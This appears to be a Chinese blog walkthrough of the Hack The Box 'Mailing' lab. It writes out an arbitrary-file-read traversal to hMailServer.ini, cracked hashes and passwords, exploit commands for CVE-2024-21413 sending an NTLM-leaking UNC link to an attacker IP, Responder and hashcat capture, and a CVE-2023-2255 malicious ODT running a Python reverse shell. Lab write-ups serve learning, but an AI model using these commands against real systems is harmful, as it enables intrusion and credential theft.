htb_Mailing

在这里插入图片描述

端口扫描
在这里插入图片描述

主页有一个download按键
在这里插入图片描述

点击后下载了一个pdf
在这里插入图片描述

大致看了一下,就是一个使用邮件服务器的说明书
不过最后有一个用户名Maya
在这里插入图片描述

目录扫描
在这里插入图片描述

/assests/
一个存图片的地方
在这里插入图片描述
/download.php
需要指定下载文件,大概就是刚刚那个pdf
在这里插入图片描述

返回主页再次下载pdf并抓包
通过get请求传递文件路径
尝试修改文件路径实现任意文件下载
在这里插入图片描述

查看windows配置文件/Windows/win.ini
成功
存在任意文件读取漏洞
在这里插入图片描述
hmailserver服务的配置文件为hMailServer.ini,尝试读取
在这里插入图片描述
寻找hMilServer服务的绝对路径

直接尝试默认安装路径

C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI

本来就是在C:\下,因此路径为../../../../../Program Files (x86)\hMailServer\Bin\hMailServer.INI

嘿嘿

读出来了
在这里插入图片描述

841bb5acfa6779ae432fd7a4e6600ba7
0a9f8ad8bf896b501dde74f08efd7e4c

解密
在这里插入图片描述homenetworkingadministrator

搜索后发现可以使用telnet连接pop3
在这里插入图片描述
在这里插入图片描述
需要使用完整email地址,在用户名后加上@mailing.htb

telnet 10.129.57.185 110
USER administrator@mailing.htb
PASS homenetworkingadministrator

在这里插入图片描述

没有邮件
在这里插入图片描述

下一步不知道怎么走,看了别人的提示发现是要利用cve
CVE-2024-21413

Microsoft Office Outlook是微软office的组件之一,也是常用的邮件客户端之一。CVE-2024-21413 是在
Microsoft Outlook 中发现的一个重大安全漏洞,CVSS 评分
9.8。攻击者将一个带恶意链接的邮件发送给被攻击用户,当用户点击链接时,会导致NTLM窃取与远程代码执行(RCE),并且该漏洞还能使攻击者能够绕过Office文档的受保护视图。

正好前面的pdf提到Maya会查阅邮件,使用exp攻击

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.16.22\cc' --subject cccc

得先启动responder监听

responder -I tun0 -v

目录底下得有url里面写的目录
在这里插入图片描述
在这里插入图片描述
将hash复制下来解密

hashcat -m 5600 ntlm.txt

maya/m4y4ngs4ri

evil-winrm登录
在这里插入图片描述
whoami /priv没有可利用的
在这里插入图片描述
netstat -ano也没有找到有用的

查看提示后发现利用点在LibreOffice

版本为7.4
在这里插入图片描述

CVE-2023-2255

生成一个odt文件,若使用管理员权限运行,就能使用管理员权限执行命令
提示中写道Importtant Documents目录有管理员执行权限

icacls C:\"Important Documents"

在这里插入图片描述

正好该靶机有python3,因此弄一个python的反弹shell
在这里插入图片描述
在这里插入图片描述
利用exp生成odt

python3 CVE-2023-2255.py --cmd "python C:\Users\maya\Desktop\shell.py" --output 'shell.odt'

上传靶机
在这里插入图片描述

稍等一会
返回管理员权限shell
在这里插入图片描述

还可以使用crackmapexec导出hash
在这里插入图片描述

  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值